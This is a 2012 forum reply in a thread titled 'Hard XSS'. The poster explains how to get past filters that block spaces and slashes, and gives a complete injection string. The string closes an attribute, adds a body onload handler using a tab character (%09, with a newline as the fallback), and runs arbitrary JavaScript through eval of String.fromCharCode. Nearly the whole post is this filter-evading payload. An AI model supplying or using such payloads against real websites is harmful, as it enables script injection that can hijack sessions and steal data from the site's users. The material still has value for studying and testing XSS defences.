Re: Hard XSS
Date: August 13, 2012 08:32AM
That should work. If you want to run whatever js from there, converting it to CharCode and then eval()-ing it should let you run anything you want without spaces or slashes.
So the final injection would be
"><body%09onload="eval(String.fromCharCode(convertedPayload))">
Also, if %09 doesn't work for some odd reason, you could try a newline (%0A).
Edited 1 time(s). Last edit at 08/13/2012 09:02AM by cr101.